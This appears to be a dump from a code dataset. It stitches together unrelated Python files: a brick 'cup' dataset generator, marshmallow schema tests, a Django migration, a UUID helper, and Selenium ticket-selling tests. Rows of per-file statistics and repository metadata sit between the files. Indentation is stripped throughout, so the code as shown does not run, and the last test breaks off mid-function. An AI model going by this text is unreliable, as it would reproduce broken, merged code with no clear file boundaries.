brick_ = brick.Brick()
brick_.set_position([-1, 3, 3])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
for k in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 4, j * 6, 7 - 4 * k])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([-1, 3, 7])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([5, i * 4 + 1, 8])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([2, i * 6, 8])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([-2, i * 4 + 1, 8])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([-3, 3, 7])
brick_.set_direction(0)
list_brick_.append(brick_)
for brick_ in list_brick_:
bricks_.add(brick_)
return bricks_
def cup_23():
bricks_ = bricks.Bricks(150)
list_brick_ = []
brick_ = brick.Brick()
brick_.set_position([0, 0, 5])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([-1, i * 2 + 1, 5 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([i * 2, 6, 5 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([5, 5 - i * 2, 5 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([4 - i * 2, 0, 5 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(4):
for k in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 4, j * 2, 4 - k])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(4):
for j in range(3):
brick_ = brick.Brick()
brick_.set_position([2, i * 2, 2 - j])
brick_.set_direction(1)
list_brick_.append(brick_)
for brick_ in list_brick_:
bricks_.add(brick_)
return bricks_
def cup_24():
bricks_ = bricks.Bricks(100)
list_brick_ = []
for i in range(4):
brick_ = brick.Brick()
brick_.set_position([i * 2, 0, 5 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([-1, i * 2 + 1, 5 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([7, i * 2 + 1, 5 + (i % 2 == 1)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(4):
brick_ = brick.Brick()
brick_.set_position([i * 2, 6, 5 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 2 + 1, j * 4 + 1, 4])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
for j in range(3):
brick_ = brick.Brick()
brick_.set_position([3, 2 * i + 2, 3 - j])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 2 + 1, j * 4 + 1, 0])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([-2, i * 4, 7])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([i * 4 - 1, 7, 7])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 4 + 1, -1, 7])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([8, i * 4, 7])
brick_.set_direction(0)
list_brick_.append(brick_)
for brick_ in list_brick_:
bricks_.add(brick_)
return bricks_
def cup_25():
bricks_ = bricks.Bricks(100)
list_brick_ = []
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([i * 2, 0, 6 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([j * 6 - 1, i * 2 + 1, 6 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([i * 2, 6, 6 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 4, j * 6, 5])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 6 - 1, 3, 5])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
for j in range(4):
brick_ = brick.Brick()
brick_.set_position([i * 4, j * 2, 4])
brick_.set_direction(1)
list_brick_.append(brick_)
for brick_ in list_brick_:
bricks_.add(brick_)
return bricks_
def cup_26():
bricks_ = bricks.Bricks(100)
list_brick_ = []
for i in range(4):
brick_ = brick.Brick()
brick_.set_position([i * 2, 0, 5 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([-1, i * 2 + 1, 5 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([7, i * 2 + 1, 5 + (i % 2 == 1)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(4):
brick_ = brick.Brick()
brick_.set_position([i * 2, 6, 5 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 2 + 1, j * 4 + 1, 4])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
for j in range(3):
brick_ = brick.Brick()
brick_.set_position([3, 2 * i + 2, 3 - j])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 2 + 1, j * 4 + 1, 0])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 4 + 1, j * 4 + 1, 7])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 6, 3, 7])
brick_.set_direction(1)
list_brick_.append(brick_)
for brick_ in list_brick_:
bricks_.add(brick_)
return bricks_
def cup_27():
bricks_ = bricks.Bricks(150)
list_brick_ = []
brick_ = brick.Brick()
brick_.set_position([0, 0, 5])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([-1, i * 2 + 1, 5 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([i * 2, 6, 5 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([5, 5 - i * 2, 5 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([4 - i * 2, 0, 5 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(4):
brick_ = brick.Brick()
brick_.set_position([i * 4, j * 2, 4])
brick_.set_direction(1)
list_brick_.append(brick_)
for brick_ in list_brick_:
bricks_.add(brick_)
return bricks_
def cup_28():
bricks_ = bricks.Bricks(150)
list_brick_ = []
brick_ = brick.Brick()
brick_.set_position([0, 0, 5])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([-1, i * 2 + 1, 5 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([i * 2, 6, 5 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([5, 5 - i * 2, 5 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([4 - i * 2, 0, 5 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
for k in range(5):
brick_ = brick.Brick()
brick_.set_position([i * 6 - 1, j * 6, 7 + k])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
for j in range(5):
brick_ = brick.Brick()
brick_.set_position([2, i * 6, 7 + j])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(5):
brick_ = brick.Brick()
brick_.set_position([i * 6 - 1, 3, 7 + j])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 4, j * 2 + 2, 4])
brick_.set_direction(1)
list_brick_.append(brick_)
for brick_ in list_brick_:
bricks_.add(brick_)
return bricks_
def cup_29():
bricks_ = bricks.Bricks(150)
list_brick_ = []
brick_ = brick.Brick()
brick_.set_position([0, 0, 5])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([-1, i * 2 + 1, 5 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 2, 4, 5 + (i % 2 == 0)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([3, 3 - i * 2, 5 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([2, 0, 6])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(5):
brick_ = brick.Brick()
brick_.set_position([-1, 1, 7 + i])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(5):
brick_ = brick.Brick()
brick_.set_position([2, 0, 7 + i])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(5):
brick_ = brick.Brick()
brick_.set_position([0, 4, 7 + i])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(5):
brick_ = brick.Brick()
brick_.set_position([3, 3, 7 + i])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
for j in range(4):
brick_ = brick.Brick()
brick_.set_position([i * 4 - 1, j * 2 - 1, 4])
brick_.set_direction(1)
list_brick_.append(brick_)
for brick_ in list_brick_:
bricks_.add(brick_)
return bricks_
def cup_30():
bricks_ = bricks.Bricks(100)
list_brick_ = []
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([i * 2, 0, 6 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([j * 6 - 1, i * 2 + 1, 6 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([i * 2, 6, 6 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
for k in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 4, j * 6, 5 - k])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 6 - 1, 3, 5 - j])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
for j in range(4):
brick_ = brick.Brick()
brick_.set_position([i * 4, j * 2, 3])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(4):
brick_ = brick.Brick()
brick_.set_position([1, 1, 8 + i])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(4):
brick_ = brick.Brick()
brick_.set_position([0, 4, 8 + i])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(4):
brick_ = brick.Brick()
brick_.set_position([3, 5, 8 + i])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(4):
brick_ = brick.Brick()
brick_.set_position([4, 2, 8 + i])
brick_.set_direction(0)
list_brick_.append(brick_)
for brick_ in list_brick_:
bricks_.add(brick_)
return bricks_
if __name__ == '__main__':
list_bricks_ = [
cup_1(),
cup_2(),
cup_3(),
cup_4(),
cup_5(),
cup_6(),
cup_7(),
cup_8(),
cup_9(),
cup_10(),
cup_11(),
cup_12(),
cup_13(),
cup_14(),
cup_15(),
cup_16(),
cup_17(),
cup_18(),
cup_19(),
cup_20(),
cup_21(),
cup_22(),
cup_23(),
cup_24(),
cup_25(),
cup_26(),
cup_27(),
cup_28(),
cup_29(),
cup_30(),
]
dataset_common.create_bricks(list_bricks_, dataset_common.STR_LABEL_CUP)
| 28.530166
| 78
| 0.522455
| 10,153
| 75,662
| 3.557963
| 0.006205
| 0.344646
| 0.358349
| 0.266305
| 0.988069
| 0.987681
| 0.9871
| 0.986962
| 0.986436
| 0.983141
| 0
| 0.053873
| 0.349634
| 75,662
| 2,651
| 79
| 28.540928
| 0.680235
| 0
| 0
| 0.884004
| 0
| 0
| 0.000106
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014032
| false
| 0
| 0.001403
| 0
| 0.029467
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
7554b1d34c6de3134c535272754fff9f906e1843
| 6,413
|
py
|
Python
|
tests/schema/test_show.py
|
aliceplex/schema
|
cb559e0172462c743d90c26a77419833b55d113a
|
[
"Apache-2.0"
] | null | null | null |
tests/schema/test_show.py
|
aliceplex/schema
|
cb559e0172462c743d90c26a77419833b55d113a
|
[
"Apache-2.0"
] | 5
|
2018-11-26T06:00:48.000Z
|
2018-11-27T07:09:52.000Z
|
tests/schema/test_show.py
|
aliceplex/schema
|
cb559e0172462c743d90c26a77419833b55d113a
|
[
"Apache-2.0"
] | null | null | null |
from datetime import date
import pytest
from marshmallow import ValidationError
from aliceplex.schema import Actor, Show, ShowSchema, ShowStrictSchema
def test_show_schema_load(show_schema: ShowSchema):
schema = show_schema
load = schema.load({
"title": "title",
"sort_title": "sort_title",
"original_title": "original_title",
"content_rating": "content_rating",
"tagline": ["tagline"],
"studio": ["studio"],
"aired": "2018-01-01",
"summary": "summary",
"rating": 1,
"genres": ["genres"],
"collections": ["collections"],
"actors": [{
"name": "name",
"role": "role"
}],
"season_summary": {
1: "Season 1 Summary"
}
})
assert load == Show(
title="title",
sort_title="sort_title",
original_title="original_title",
content_rating="content_rating",
tagline=["tagline"],
studio=["studio"],
aired=date(2018, 1, 1),
summary="summary",
rating=1,
genres=["genres"],
collections=["collections"],
actors=[Actor(name="name", role="role")],
season_summary={1: "Season 1 Summary"}
)
load = schema.load({
"title": "",
"sort_title": "",
"original_title": None,
"content_rating": "",
"tagline": [""],
"studio": [None],
"aired": None,
"summary": None,
"rating": None,
"genres": [],
"collections": None,
"actors": [],
"season_summary": {}
})
assert load == Show()
load = schema.load({})
assert load == Show()
def test_show_schema_dump(show_schema: ShowSchema):
schema = show_schema
dump = schema.dump(Show(
title="title",
sort_title="sort_title",
original_title="original_title",
content_rating="content_rating",
tagline=["tagline"],
studio=["studio"],
aired=date(2018, 1, 1),
summary="summary",
rating=1,
genres=["genres"],
collections=["collections"],
actors=[Actor(name="name", role="role")],
season_summary={1: "Season 1 Summary"}
))
assert dump == {
"title": "title",
"sort_title": "sort_title",
"original_title": "original_title",
"content_rating": "content_rating",
"tagline": ["tagline"],
"studio": ["studio"],
"aired": "2018-01-01",
"summary": "summary",
"rating": 1,
"genres": ["genres"],
"collections": ["collections"],
"actors": [{
"name": "name",
"role": "role",
"photo": None
}],
"season_summary": {
1: "Season 1 Summary"
}
}
dump = schema.dump(Show())
assert dump == {
"title": None,
"sort_title": None,
"original_title": None,
"content_rating": None,
"tagline": [],
"studio": [],
"aired": None,
"summary": None,
"rating": None,
"genres": [],
"collections": [],
"actors": [],
"season_summary": {}
}
def test_show_strict_schema_load(show_strict_schema: ShowStrictSchema):
schema = show_strict_schema
load = schema.load({
"title": "title",
"sort_title": "sort_title",
"original_title": "original_title",
"content_rating": "content_rating",
"tagline": ["tagline"],
"studio": ["studio"],
"aired": "2018-01-01",
"summary": "summary",
"rating": 1,
"genres": ["genres"],
"collections": ["collections"],
"actors": [{
"name": "name",
"role": "role"
}],
"season_summary": {
1: "Season 1 Summary"
}
})
assert load == Show(
title="title",
sort_title="sort_title",
original_title="original_title",
content_rating="content_rating",
tagline=["tagline"],
studio=["studio"],
aired=date(2018, 1, 1),
summary="summary",
rating=1,
genres=["genres"],
collections=["collections"],
actors=[Actor(name="name", role="role")],
season_summary={1: "Season 1 Summary"}
)
with pytest.raises(ValidationError):
schema.load({
"title": None,
"sort_title": None,
"original_title": None,
"content_rating": None,
"tagline": None,
"studio": None,
"aired": None,
"summary": None,
"rating": None,
"genres": None,
"collections": None,
"actors": None,
"season_summary": None
})
with pytest.raises(ValidationError):
schema.load({})
def test_show_strict_schema_dump(show_strict_schema: ShowStrictSchema):
schema = show_strict_schema
dump = schema.dump(Show(
title="title",
sort_title="sort_title",
original_title="original_title",
content_rating="content_rating",
tagline=["tagline"],
studio=["studio"],
aired=date(2018, 1, 1),
summary="summary",
rating=1,
genres=["genres"],
collections=["collections"],
actors=[Actor(name="name", role="role")],
season_summary={1: "Season 1 Summary"}
))
assert dump == {
"title": "title",
"sort_title": "sort_title",
"original_title": "original_title",
"content_rating": "content_rating",
"tagline": ["tagline"],
"studio": ["studio"],
"aired": "2018-01-01",
"summary": "summary",
"rating": 1,
"genres": ["genres"],
"collections": ["collections"],
"actors": [{
"name": "name",
"role": "role",
"photo": None
}],
"season_summary": {
1: "Season 1 Summary"
}
}
dump = schema.dump(Show())
assert dump == {
"title": None,
"sort_title": None,
"original_title": None,
"content_rating": None,
"tagline": [],
"studio": [],
"aired": None,
"summary": None,
"rating": None,
"genres": [],
"collections": [],
"actors": [],
"season_summary": {}
}
| 27.523605
| 71
| 0.500234
| 569
| 6,413
| 5.465729
| 0.072056
| 0.057878
| 0.076527
| 0.063666
| 0.898392
| 0.869453
| 0.823794
| 0.823794
| 0.789389
| 0.759807
| 0
| 0.018727
| 0.333853
| 6,413
| 232
| 72
| 27.642241
| 0.70927
| 0
| 0
| 0.86036
| 0
| 0
| 0.280992
| 0
| 0
| 0
| 0
| 0
| 0.036036
| 1
| 0.018018
| false
| 0
| 0.018018
| 0
| 0.036036
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f32c65987adac3b4d47312c0171c6e65ee072c5a
| 2,798
|
py
|
Python
|
blackbox/backoffice/migrations/0021_codeanalyse_qualysanalyse.py
|
Security-As-A-Service/Cloud-Security-SaaS
|
0a56d231e5184e6923e81c11b7dfdb7b06ad76d7
|
[
"MIT"
] | 1
|
2019-03-19T05:21:55.000Z
|
2019-03-19T05:21:55.000Z
|
blackbox/backoffice/migrations/0021_codeanalyse_qualysanalyse.py
|
Security-As-A-Service/Cloud-Security-SaaS
|
0a56d231e5184e6923e81c11b7dfdb7b06ad76d7
|
[
"MIT"
] | null | null | null |
blackbox/backoffice/migrations/0021_codeanalyse_qualysanalyse.py
|
Security-As-A-Service/Cloud-Security-SaaS
|
0a56d231e5184e6923e81c11b7dfdb7b06ad76d7
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-09-24 23:08
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('backoffice', '0020_auto_20170924_2354'),
]
operations = [
migrations.CreateModel(
name='CodeAnalyse',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('nbr_Day', models.IntegerField(default=0)),
('start_date', models.DateTimeField()),
('auditor', models.CharField(choices=[('BF', 'Beijaflore'), ('Nes', 'Nes'), ('Gfi', 'Gfi'), ('ISPL', 'ISPL'), ('AST', 'AppSecTeam')], default='null', max_length=15)),
('pilote', models.CharField(choices=[('dla', 'Damien Lallement'), ('ala', 'Alexandre Lasnier'), ('...', '...')], default='null', max_length=15)),
('total_vulnerability', models.IntegerField(default=0)),
('critical_vulnerability', models.IntegerField(default=0)),
('high_vulnerability', models.IntegerField(default=0)),
('medium_vulnerability', models.IntegerField(default=0)),
('low_vulnerability', models.IntegerField(default=0)),
('target', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='backoffice.AppList')),
],
),
migrations.CreateModel(
name='QualysAnalyse',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('nbr_Day', models.IntegerField(default=0)),
('start_date', models.DateTimeField()),
('auditor', models.CharField(choices=[('BF', 'Beijaflore'), ('Nes', 'Nes'), ('Gfi', 'Gfi'), ('ISPL', 'ISPL'), ('AST', 'AppSecTeam')], default='null', max_length=15)),
('pilote', models.CharField(choices=[('dla', 'Damien Lallement'), ('ala', 'Alexandre Lasnier'), ('...', '...')], default='null', max_length=15)),
('total_vulnerability', models.IntegerField(default=0)),
('critical_vulnerability', models.IntegerField(default=0)),
('high_vulnerability', models.IntegerField(default=0)),
('medium_vulnerability', models.IntegerField(default=0)),
('low_vulnerability', models.IntegerField(default=0)),
('target', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='backoffice.AppList')),
],
),
]
| 54.862745
| 182
| 0.585061
| 266
| 2,798
| 6.018797
| 0.334586
| 0.134916
| 0.187383
| 0.194878
| 0.814491
| 0.814491
| 0.814491
| 0.814491
| 0.814491
| 0.814491
| 0
| 0.027583
| 0.235525
| 2,798
| 50
| 183
| 55.96
| 0.720898
| 0.024303
| 0
| 0.744186
| 1
| 0
| 0.208654
| 0.024569
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.069767
| 0
| 0.139535
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
f35a7f7237ff4a7610d8c52c57038b43a701a4d1
| 167
|
py
|
Python
|
nbmetalog/get_session_uuid.py
|
mmore500/nbmetalog
|
670f8ad76a587d8848c81e4f790c31c96402f8b0
|
[
"MIT"
] | null | null | null |
nbmetalog/get_session_uuid.py
|
mmore500/nbmetalog
|
670f8ad76a587d8848c81e4f790c31c96402f8b0
|
[
"MIT"
] | 1
|
2021-09-02T16:08:58.000Z
|
2021-09-02T16:08:58.000Z
|
nbmetalog/get_session_uuid.py
|
mmore500/nbmetalog
|
670f8ad76a587d8848c81e4f790c31c96402f8b0
|
[
"MIT"
] | null | null | null |
from functools import lru_cache
import uuid
from . import _except_return_none
@lru_cache()
@_except_return_none
def get_session_uuid():
return str(uuid.uuid4())
| 16.7
| 33
| 0.790419
| 25
| 167
| 4.88
| 0.56
| 0.131148
| 0.262295
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006897
| 0.131737
| 167
| 9
| 34
| 18.555556
| 0.834483
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| true
| 0
| 0.428571
| 0.142857
| 0.714286
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
45ee2aadc4de031f3588c2f6b5b6f76945d5cead
| 10,427
|
py
|
Python
|
CI-Python/qa327_test/frontend/test_sell.py
|
michael-fourie/Mags_Co
|
b9c8ae1730fabde3da95ed0f271ff061505a06c2
|
[
"MIT"
] | 3
|
2020-11-06T21:54:57.000Z
|
2020-12-10T22:06:24.000Z
|
CI-Python/qa327_test/frontend/test_sell.py
|
michael-fourie/Mags_Co
|
b9c8ae1730fabde3da95ed0f271ff061505a06c2
|
[
"MIT"
] | 3
|
2020-11-30T01:04:41.000Z
|
2020-12-13T19:29:45.000Z
|
CI-Python/qa327_test/frontend/test_sell.py
|
michael-fourie/Mags_Co
|
b9c8ae1730fabde3da95ed0f271ff061505a06c2
|
[
"MIT"
] | 3
|
2020-11-23T19:25:41.000Z
|
2022-02-04T15:18:19.000Z
|
import pytest
from seleniumbase import BaseCase
from qa327_test.conftest import base_url
from unittest.mock import patch
from qa327.models import db, User, Form, Ticket
from werkzeug.security import generate_password_hash, check_password_hash
import requests
"""
This file defines all unit tests for the frontend selling functionality.
"""
# Mock a sample user
test_user = User(
email='test_frontend@test.com',
name='test_frontend',
password=generate_password_hash('Test_frontend@'),
balance="500"
)
# Mock some sample tickets
test_ticket = Ticket(
name='t1',
price="100",
quantity="2",
email='test123@email.com',
date='02/23/2020'
)
test_tickets = [
Ticket(name='t1', price="100", quantity="2", email='test1@email.com', date='20200223'),
Ticket(name='t2', price="110", quantity="10", email='test2@gmail.com', date='20200314')
]
class FrontEndSellTest(BaseCase):
@patch('qa327.backend.get_user', return_value=test_user)
@patch('qa327.backend.get_ticket', return_value=test_ticket)
@patch('qa327.backend.get_all_tickets', return_value=test_tickets)
def test_sell_ticket_name_alnum(self, *_):
"""The name of the ticket has to be alphanumeric-only, and space allowed only if its nit
the first or last character
R4.1
"""
#logout to invalidate any logged in session
self.open(base_url + '/logout')
#login a user
self.open(base_url + '/login')
# fill email and password
self.type("#email", "test_frontend@test.com")
self.type("#password", "Test_frontend@")
# click enter button
self.click('input[type="submit"]')
#open the base url
self.open(base_url)
#Enter an invalid ticket name
self.type('#name_sell', " invalid ")
self.type("#price_sell", "100")
self.type("#quantity_sell", "2")
self.type("#exp_date_sell", "20200921")
self.click('#submit-sell')
#Assert that the valid error message is shown.
self.assert_text("Invalid spaces found in word", "#message")
@patch('qa327.backend.get_user', return_value=test_user)
@patch('qa327.backend.get_ticket', return_value=test_ticket)
def test_sell_ticket_name_length(self, *_):
"""The name if the ticket is no longer than 60 characters
R4.2
"""
# logout to invalidate any logged in session
self.open(base_url + '/logout')
# login a user
self.open(base_url + '/login')
# fill email and password
self.type("#email", "test_frontend@test.com")
self.type("#password", "Test_frontend@")
# click enter button
self.click('input[type="submit"]')
# open the /sell route
self.open(base_url)
# Enter an invalid ticket name
self.type('#name_sell', "thisnamewillbewaytoolongforitevertobevalidihopeimeanwhatticketwilleverneedanamethatsthislongisthisoversixtycharactersyetidontknowbutletshopeso")
self.type("#price_sell", "100")
self.type("#quantity_sell", "2")
self.type("#exp_date_sell", "20200921")
self.click('#submit-sell')
# Assert that the valid error message is shown.
self.assert_text("Ticket name is too long", "#message")
@patch('qa327.backend.get_user', return_value=test_user)
@patch('qa327.backend.get_ticket', return_value=test_ticket)
def test_sell_ticket_valid_quantity(self, *_):
"""The quantity of the tickets has to be more than 0, and less than or equal to 100.
R4.3
"""
# logout to invalidate any logged in session
self.open(base_url + '/logout')
# login a user
self.open(base_url + '/login')
# fill email and password
self.type("#email", "test_frontend@test.com")
self.type("#password", "Test_frontend@")
# click enter button
self.click('input[type="submit"]')
# open the /sell route
self.open(base_url)
# Enter an invalid ticket name
self.type('#name_sell', "ticketname")
self.type('#quantity_sell', "-1")
self.type("#price_sell", "15")
self.type("#exp_date_sell", "20200921")
self.click('#submit-sell')
# Assert that the valid error message is shown
self.assert_text("Invalid quantity of tickets", "#message")
# logout to invalidate any logged in session
self.open(base_url + '/logout')
# login a user
self.open(base_url + '/login')
# fill email and password
self.type("#email", "test_frontend@test.com")
self.type("#password", "Test_frontend@")
# click enter button
self.click('input[type="submit"]')
# open the /sell route
self.open(base_url)
# Enter an invalid ticket name
self.type('#name_sell', "ticketname")
self.type('#quantity_sell', "101")
self.type("#price_sell", "15")
self.type("#exp_date_sell", "20200921")
self.click('#submit-sell')
# Assert that the valid error message is shown
self.assert_text("Invalid quantity of tickets", "#message")
@patch('qa327.backend.get_user', return_value=test_user)
@patch('qa327.backend.get_ticket', return_value=test_ticket)
def test_sell_ticket_price_range(self, *_):
"""The price has to be of range [10,100]
R4.4
"""
# logout to invalidate any logged in session
self.open(base_url + '/logout')
# login a user
self.open(base_url + '/login')
# fill email and password
self.type("#email", "test_frontend@test.com")
self.type("#password", "Test_frontend@")
# click enter button
self.click('input[type="submit"]')
# open the /sell route
self.open(base_url)
# Enter an invalid ticket name
self.type('#name_sell', "testticket")
self.type("#quantity_sell", "1")
self.type("#price_sell", "101")
self.click('#submit-sell')
# Assert that the valid error message is shown.
self.assert_text("Ticket price outside of valid range", "#message")
# logout to invalidate any logged in session
self.open(base_url + '/logout')
# login a user
self.open(base_url + '/login')
# fill email and password
self.type("#email", "test_frontend@test.com")
self.type("#password", "Test_frontend@")
# click enter button
self.click('input[type="submit"]')
# open the /sell route
self.open(base_url)
# Enter an invalid ticket name
self.type('#name_sell', "testticket")
